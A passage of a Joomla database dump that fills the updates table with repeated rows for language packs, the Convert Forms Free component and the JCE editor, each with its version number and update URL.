(225, 3, 0, 'Slovenian', '', 'pkg_sl-SI', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sl-SI_details.xml', '', ''),
(226, 3, 0, 'Spanish CO', '', 'pkg_es-CO', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/es-CO_details.xml', '', ''),
(227, 3, 0, 'German CH', '', 'pkg_de-CH', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-CH_details.xml', '', ''),
(228, 3, 0, 'German AT', '', 'pkg_de-AT', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-AT_details.xml', '', ''),
(229, 3, 0, 'German LI', '', 'pkg_de-LI', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-LI_details.xml', '', ''),
(230, 3, 0, 'German LU', '', 'pkg_de-LU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-LU_details.xml', '', ''),
(231, 3, 0, 'Kazakh', '', 'pkg_kk-KZ', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/kk-KZ_details.xml', '', ''),
(232, 17, 0, 'Convert Forms Free', 'Convert Forms Free', 'com_convertforms', 'component', '', 1, '2.3.3', '', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 'https://www.tassos.gr/update/convertformsfree?view=Items&release_id=473', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(233, 18, 0, 'JCE 2.7.14', '', 'pkg_jce', 'package', '', 0, '2.7.14', '', 'https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml', 'https://www.joomlacontenteditor.net/news/jce-pro-2-7-14-released', ''),
(234, 3, 0, 'Romanian', '', 'pkg_ro-RO', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/ro-RO_details.xml', '', ''),
(235, 3, 0, 'Flemish', '', 'pkg_nl-BE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/nl-BE_details.xml', '', ''),
(236, 3, 0, 'French', '', 'pkg_fr-FR', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/fr-FR_details.xml', '', ''),
(237, 3, 0, 'Georgian', '', 'pkg_ka-GE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ka-GE_details.xml', '', ''),
(238, 3, 0, 'Greek', '', 'pkg_el-GR', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/el-GR_details.xml', '', ''),
(239, 3, 0, 'Japanese', '', 'pkg_ja-JP', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ja-JP_details.xml', '', ''),
(240, 3, 0, 'Chinese Simplified', '', 'pkg_zh-CN', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/zh-CN_details.xml', '', ''),
(241, 3, 0, 'Danish', '', 'pkg_da-DK', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/da-DK_details.xml', '', ''),
(242, 3, 0, 'Italian', '', 'pkg_it-IT', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/it-IT_details.xml', '', ''),
(243, 3, 0, 'Lithuanian', '', 'pkg_lt-LT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/lt-LT_details.xml', '', ''),
(244, 3, 0, 'Persian', '', 'pkg_fa-IR', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/fa-IR_details.xml', '', ''),
(245, 3, 0, 'Russian', '', 'pkg_ru-RU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ru-RU_details.xml', '', ''),
(246, 3, 0, 'Slovak', '', 'pkg_sk-SK', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sk-SK_details.xml', '', ''),
(247, 3, 0, 'Swedish', '', 'pkg_sv-SE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sv-SE_details.xml', '', ''),
(248, 3, 0, 'Tamil', '', 'pkg_ta-IN', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ta-IN_details.xml', '', ''),
(249, 3, 0, 'Thai', '', 'pkg_th-TH', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/th-TH_details.xml', '', ''),
(250, 3, 0, 'German DE', '', 'pkg_de-DE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-DE_details.xml', '', ''),
(251, 3, 0, 'Portuguese Brazil', '', 'pkg_pt-BR', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/pt-BR_details.xml', '', ''),
(252, 3, 0, 'Serbian Latin', '', 'pkg_sr-YU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sr-YU_details.xml', '', ''),
(253, 3, 0, 'Serbian Cyrillic', '', 'pkg_sr-RS', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sr-RS_details.xml', '', ''),
(254, 3, 0, 'Swahili', '', 'pkg_sw-KE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sw-KE_details.xml', '', ''),
(255, 3, 0, 'Welsh', '', 'pkg_cy-GB', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/cy-GB_details.xml', '', ''),
(256, 3, 0, 'Slovenian', '', 'pkg_sl-SI', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sl-SI_details.xml', '', ''),
(257, 3, 0, 'Spanish CO', '', 'pkg_es-CO', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/es-CO_details.xml', '', ''),
(258, 3, 0, 'German CH', '', 'pkg_de-CH', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-CH_details.xml', '', ''),
(259, 3, 0, 'German AT', '', 'pkg_de-AT', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-AT_details.xml', '', ''),
(260, 3, 0, 'German LI', '', 'pkg_de-LI', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-LI_details.xml', '', ''),
(261, 3, 0, 'German LU', '', 'pkg_de-LU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-LU_details.xml', '', ''),
(262, 3, 0, 'Kazakh', '', 'pkg_kk-KZ', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/kk-KZ_details.xml', '', ''),
(263, 17, 0, 'Convert Forms Free', 'Convert Forms Free', 'com_convertforms', 'component', '', 1, '2.3.4', '', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 'https://www.tassos.gr/update/convertformsfree?view=Items&release_id=483', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(264, 18, 0, 'JCE 2.7.14', '', 'pkg_jce', 'package', '', 0, '2.7.14', '', 'https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml', 'https://www.joomlacontenteditor.net/news/jce-pro-2-7-14-released', ''),
(265, 3, 0, 'Romanian', '', 'pkg_ro-RO', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/ro-RO_details.xml', '', ''),
(266, 3, 0, 'Flemish', '', 'pkg_nl-BE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/nl-BE_details.xml', '', ''),
(267, 3, 0, 'French', '', 'pkg_fr-FR', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/fr-FR_details.xml', '', ''),
(268, 3, 0, 'Georgian', '', 'pkg_ka-GE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ka-GE_details.xml', '', ''),
(269, 3, 0, 'Greek', '', 'pkg_el-GR', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/el-GR_details.xml', '', ''),
(270, 3, 0, 'Japanese', '', 'pkg_ja-JP', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ja-JP_details.xml', '', ''),
(271, 3, 0, 'Chinese Simplified', '', 'pkg_zh-CN', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/zh-CN_details.xml', '', ''),
(272, 3, 0, 'Danish', '', 'pkg_da-DK', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/da-DK_details.xml', '', ''),
(273, 3, 0, 'Italian', '', 'pkg_it-IT', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/it-IT_details.xml', '', ''),
(274, 3, 0, 'Lithuanian', '', 'pkg_lt-LT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/lt-LT_details.xml', '', ''),
(275, 3, 0, 'Persian', '', 'pkg_fa-IR', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/fa-IR_details.xml', '', ''),
(276, 3, 0, 'Russian', '', 'pkg_ru-RU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ru-RU_details.xml', '', ''),
(277, 3, 0, 'Slovak', '', 'pkg_sk-SK', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sk-SK_details.xml', '', ''),
(278, 3, 0, 'Swedish', '', 'pkg_sv-SE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sv-SE_details.xml', '', ''),
(279, 3, 0, 'Tamil', '', 'pkg_ta-IN', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ta-IN_details.xml', '', ''),
(280, 3, 0, 'Thai', '', 'pkg_th-TH', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/th-TH_details.xml', '', ''),
(281, 3, 0, 'German DE', '', 'pkg_de-DE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-DE_details.xml', '', ''),
(282, 3, 0, 'Portuguese Brazil', '', 'pkg_pt-BR', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/pt-BR_details.xml', '', ''),
(283, 3, 0, 'Serbian Latin', '', 'pkg_sr-YU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sr-YU_details.xml', '', ''),
(284, 3, 0, 'Serbian Cyrillic', '', 'pkg_sr-RS', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sr-RS_details.xml', '', ''),
(285, 3, 0, 'Swahili', '', 'pkg_sw-KE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sw-KE_details.xml', '', ''),
(286, 3, 0, 'Welsh', '', 'pkg_cy-GB', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/cy-GB_details.xml', '', ''),
(287, 3, 0, 'Slovenian', '', 'pkg_sl-SI', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sl-SI_details.xml', '', ''),
(288, 3, 0, 'Spanish CO', '', 'pkg_es-CO', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/es-CO_details.xml', '', ''),
(289, 3, 0, 'German CH', '', 'pkg_de-CH', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-CH_details.xml', '', ''),
(290, 3, 0, 'German AT', '', 'pkg_de-AT', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-AT_details.xml', '', ''),
(291, 3, 0, 'German LI', '', 'pkg_de-LI', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-LI_details.xml', '', ''),
(292, 3, 0, 'German LU', '', 'pkg_de-LU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-LU_details.xml', '', ''),
(293, 3, 0, 'Kazakh', '', 'pkg_kk-KZ', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/kk-KZ_details.xml', '', ''),
(294, 17, 0, 'Convert Forms Free', 'Convert Forms Free', 'com_convertforms', 'component', '', 1, '2.3.4', '', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 'https://www.tassos.gr/update/convertformsfree?view=Items&release_id=483', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(295, 18, 0, 'JCE 2.7.14', '', 'pkg_jce', 'package', '', 0, '2.7.14', '', 'https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml', 'https://www.joomlacontenteditor.net/news/jce-pro-2-7-14-released', ''),
(296, 3, 0, 'Romanian', '', 'pkg_ro-RO', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/ro-RO_details.xml', '', ''),
(297, 3, 0, 'Flemish', '', 'pkg_nl-BE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/nl-BE_details.xml', '', ''),
(298, 3, 0, 'French', '', 'pkg_fr-FR', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/fr-FR_details.xml', '', ''),
(299, 3, 0, 'Georgian', '', 'pkg_ka-GE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ka-GE_details.xml', '', ''),
(300, 3, 0, 'Greek', '', 'pkg_el-GR', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/el-GR_details.xml', '', ''),
(301, 3, 0, 'Japanese', '', 'pkg_ja-JP', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ja-JP_details.xml', '', ''),
(302, 3, 0, 'Chinese Simplified', '', 'pkg_zh-CN', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/zh-CN_details.xml', '', ''),
(303, 3, 0, 'Danish', '', 'pkg_da-DK', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/da-DK_details.xml', '', ''),
(304, 3, 0, 'Italian', '', 'pkg_it-IT', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/it-IT_details.xml', '', ''),
(305, 3, 0, 'Lithuanian', '', 'pkg_lt-LT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/lt-LT_details.xml', '', ''),
(306, 3, 0, 'Persian', '', 'pkg_fa-IR', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/fa-IR_details.xml', '', ''),
(307, 3, 0, 'Russian', '', 'pkg_ru-RU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ru-RU_details.xml', '', ''),
(308, 3, 0, 'Slovak', '', 'pkg_sk-SK', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sk-SK_details.xml', '', ''),
(309, 3, 0, 'Swedish', '', 'pkg_sv-SE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sv-SE_details.xml', '', ''),
(310, 3, 0, 'Tamil', '', 'pkg_ta-IN', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ta-IN_details.xml', '', ''),
(311, 3, 0, 'Thai', '', 'pkg_th-TH', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/th-TH_details.xml', '', ''),
(312, 3, 0, 'German DE', '', 'pkg_de-DE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-DE_details.xml', '', ''),
(313, 3, 0, 'Portuguese Brazil', '', 'pkg_pt-BR', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/pt-BR_details.xml', '', ''),
(314, 3, 0, 'Serbian Latin', '', 'pkg_sr-YU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sr-YU_details.xml', '', ''),
(315, 3, 0, 'Serbian Cyrillic', '', 'pkg_sr-RS', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sr-RS_details.xml', '', ''),
(316, 3, 0, 'Swahili', '', 'pkg_sw-KE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sw-KE_details.xml', '', ''),
(317, 3, 0, 'Welsh', '', 'pkg_cy-GB', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/cy-GB_details.xml', '', ''),
(318, 3, 0, 'Slovenian', '', 'pkg_sl-SI', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sl-SI_details.xml', '', ''),
(319, 3, 0, 'Spanish CO', '', 'pkg_es-CO', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/es-CO_details.xml', '', ''),
(320, 3, 0, 'German CH', '', 'pkg_de-CH', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-CH_details.xml', '', ''),
(321, 3, 0, 'German AT', '', 'pkg_de-AT', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-AT_details.xml', '', ''),
(322, 3, 0, 'German LI', '', 'pkg_de-LI', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-LI_details.xml', '', ''),
(323, 3, 0, 'German LU', '', 'pkg_de-LU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-LU_details.xml', '', ''),
(324, 3, 0, 'Kazakh', '', 'pkg_kk-KZ', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/kk-KZ_details.xml', '', ''),
(325, 17, 0, 'Convert Forms Free', 'Convert Forms Free', 'com_convertforms', 'component', '', 1, '2.3.4', '', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 'https://www.tassos.gr/update/convertformsfree?view=Items&release_id=483', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(326, 18, 0, 'JCE 2.7.14', '', 'pkg_jce', 'package', '', 0, '2.7.14', '', 'https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml', 'https://www.joomlacontenteditor.net/news/jce-pro-2-7-14-released', '');
INSERT INTO `y57u5_updates` (`update_id`, `update_site_id`, `extension_id`, `name`, `description`, `element`, `type`, `folder`, `client_id`, `version`, `data`, `detailsurl`, `infourl`, `extra_query`) VALUES
(327, 3, 0, 'Romanian', '', 'pkg_ro-RO', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/ro-RO_details.xml', '', ''),
(328, 3, 0, 'Flemish', '', 'pkg_nl-BE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/nl-BE_details.xml', '', ''),
(329, 3, 0, 'French', '', 'pkg_fr-FR', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/fr-FR_details.xml', '', ''),
(330, 3, 0, 'Georgian', '', 'pkg_ka-GE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ka-GE_details.xml', '', ''),
(331, 3, 0, 'Greek', '', 'pkg_el-GR', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/el-GR_details.xml', '', ''),
(332, 3, 0, 'Japanese', '', 'pkg_ja-JP', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ja-JP_details.xml', '', ''),
(333, 3, 0, 'Chinese Simplified', '', 'pkg_zh-CN', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/zh-CN_details.xml', '', ''),
(334, 3, 0, 'Danish', '', 'pkg_da-DK', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/da-DK_details.xml', '', ''),
(335, 3, 0, 'Italian', '', 'pkg_it-IT', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/it-IT_details.xml', '', ''),
(336, 3, 0, 'Lithuanian', '', 'pkg_lt-LT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/lt-LT_details.xml', '', ''),
(337, 3, 0, 'Persian', '', 'pkg_fa-IR', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/fa-IR_details.xml', '', ''),
(338, 3, 0, 'Russian', '', 'pkg_ru-RU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ru-RU_details.xml', '', ''),
(339, 3, 0, 'Slovak', '', 'pkg_sk-SK', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sk-SK_details.xml', '', ''),
(340, 3, 0, 'Swedish', '', 'pkg_sv-SE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sv-SE_details.xml', '', ''),
(341, 3, 0, 'Tamil', '', 'pkg_ta-IN', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ta-IN_details.xml', '', ''),
(342, 3, 0, 'Thai', '', 'pkg_th-TH', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/th-TH_details.xml', '', ''),
(343, 3, 0, 'German DE', '', 'pkg_de-DE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-DE_details.xml', '', ''),
(344, 3, 0, 'Portuguese Brazil', '', 'pkg_pt-BR', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/pt-BR_details.xml', '', ''),
(345, 3, 0, 'Serbian Latin', '', 'pkg_sr-YU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sr-YU_details.xml', '', ''),
(346, 3, 0, 'Serbian Cyrillic', '', 'pkg_sr-RS', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sr-RS_details.xml', '', ''),
(347, 3, 0, 'Swahili', '', 'pkg_sw-KE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sw-KE_details.xml', '', ''),
(348, 3, 0, 'Welsh', '', 'pkg_cy-GB', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/cy-GB_details.xml', '', ''),
(349, 3, 0, 'Slovenian', '', 'pkg_sl-SI', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sl-SI_details.xml', '', ''),
(350, 3, 0, 'Spanish CO', '', 'pkg_es-CO', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/es-CO_details.xml', '', ''),
(351, 3, 0, 'German CH', '', 'pkg_de-CH', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-CH_details.xml', '', ''),
(352, 3, 0, 'German AT', '', 'pkg_de-AT', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-AT_details.xml', '', ''),
(353, 3, 0, 'German LI', '', 'pkg_de-LI', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-LI_details.xml', '', ''),
(354, 3, 0, 'German LU', '', 'pkg_de-LU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-LU_details.xml', '', ''),
(355, 3, 0, 'Kazakh', '', 'pkg_kk-KZ', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/kk-KZ_details.xml', '', ''),
(356, 17, 0, 'Convert Forms Free', 'Convert Forms Free', 'com_convertforms', 'component', '', 1, '2.3.4', '', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 'https://www.tassos.gr/update/convertformsfree?view=Items&release_id=483', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(357, 18, 0, 'JCE 2.7.14', '', 'pkg_jce', 'package', '', 0, '2.7.14', '', 'https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml', 'https://www.joomlacontenteditor.net/news/jce-pro-2-7-14-released', ''),
(358, 3, 0, 'Romanian', '', 'pkg_ro-RO', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/ro-RO_details.xml', '', ''),
(359, 3, 0, 'Flemish', '', 'pkg_nl-BE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/nl-BE_details.xml', '', ''),
(360, 3, 0, 'French', '', 'pkg_fr-FR', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/fr-FR_details.xml', '', ''),
(361, 3, 0, 'Georgian', '', 'pkg_ka-GE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ka-GE_details.xml', '', ''),
(362, 3, 0, 'Greek', '', 'pkg_el-GR', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/el-GR_details.xml', '', ''),
(363, 3, 0, 'Japanese', '', 'pkg_ja-JP', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ja-JP_details.xml', '', ''),
(364, 3, 0, 'Chinese Simplified', '', 'pkg_zh-CN', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/zh-CN_details.xml', '', ''),
(365, 3, 0, 'Danish', '', 'pkg_da-DK', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/da-DK_details.xml', '', ''),
(366, 3, 0, 'Italian', '', 'pkg_it-IT', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/it-IT_details.xml', '', ''),
(367, 3, 0, 'Lithuanian', '', 'pkg_lt-LT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/lt-LT_details.xml', '', ''),
(368, 3, 0, 'Persian', '', 'pkg_fa-IR', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/fa-IR_details.xml', '', ''),
(369, 3, 0, 'Russian', '', 'pkg_ru-RU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ru-RU_details.xml', '', ''),
(370, 3, 0, 'Slovak', '', 'pkg_sk-SK', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sk-SK_details.xml', '', ''),
(371, 3, 0, 'Swedish', '', 'pkg_sv-SE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sv-SE_details.xml', '', ''),
(372, 3, 0, 'Tamil', '', 'pkg_ta-IN', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ta-IN_details.xml', '', ''),
(373, 3, 0, 'Thai', '', 'pkg_th-TH', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/th-TH_details.xml', '', ''),
(374, 3, 0, 'German DE', '', 'pkg_de-DE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-DE_details.xml', '', ''),
(375, 3, 0, 'Portuguese Brazil', '', 'pkg_pt-BR', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/pt-BR_details.xml', '', ''),
(376, 3, 0, 'Serbian Latin', '', 'pkg_sr-YU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sr-YU_details.xml', '', ''),
(377, 3, 0, 'Serbian Cyrillic', '', 'pkg_sr-RS', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sr-RS_details.xml', '', ''),
(378, 3, 0, 'Swahili', '', 'pkg_sw-KE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sw-KE_details.xml', '', ''),
(379, 3, 0, 'Welsh', '', 'pkg_cy-GB', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/cy-GB_details.xml', '', ''),
(380, 3, 0, 'Slovenian', '', 'pkg_sl-SI', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sl-SI_details.xml', '', ''),
(381, 3, 0, 'Spanish CO', '', 'pkg_es-CO', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/es-CO_details.xml', '', ''),
(382, 3, 0, 'German CH', '', 'pkg_de-CH', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-CH_details.xml', '', ''),
(383, 3, 0, 'German AT', '', 'pkg_de-AT', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-AT_details.xml', '', ''),
(384, 3, 0, 'German LI', '', 'pkg_de-LI', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-LI_details.xml', '', ''),
(385, 3, 0, 'German LU', '', 'pkg_de-LU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-LU_details.xml', '', ''),
(386, 3, 0, 'Kazakh', '', 'pkg_kk-KZ', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/kk-KZ_details.xml', '', ''),
(387, 17, 0, 'Convert Forms Free', 'Convert Forms Free', 'com_convertforms', 'component', '', 1, '2.3.4', '', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 'https://www.tassos.gr/update/convertformsfree?view=Items&release_id=483', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(388, 18, 0, 'JCE 2.7.14', '', 'pkg_jce', 'package', '', 0, '2.7.14', '', 'https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml', 'https://www.joomlacontenteditor.net/news/jce-pro-2-7-14-released', ''),
(389, 3, 0, 'Romanian', '', 'pkg_ro-RO', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/ro-RO_details.xml', '', ''),
(390, 3, 0, 'Flemish', '', 'pkg_nl-BE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/nl-BE_details.xml', '', ''),
(391, 3, 0, 'French', '', 'pkg_fr-FR', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/fr-FR_details.xml', '', ''),
(392, 3, 0, 'Georgian', '', 'pkg_ka-GE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ka-GE_details.xml', '', ''),
(393, 3, 0, 'Greek', '', 'pkg_el-GR', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/el-GR_details.xml', '', ''),
(394, 3, 0, 'Japanese', '', 'pkg_ja-JP', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ja-JP_details.xml', '', ''),
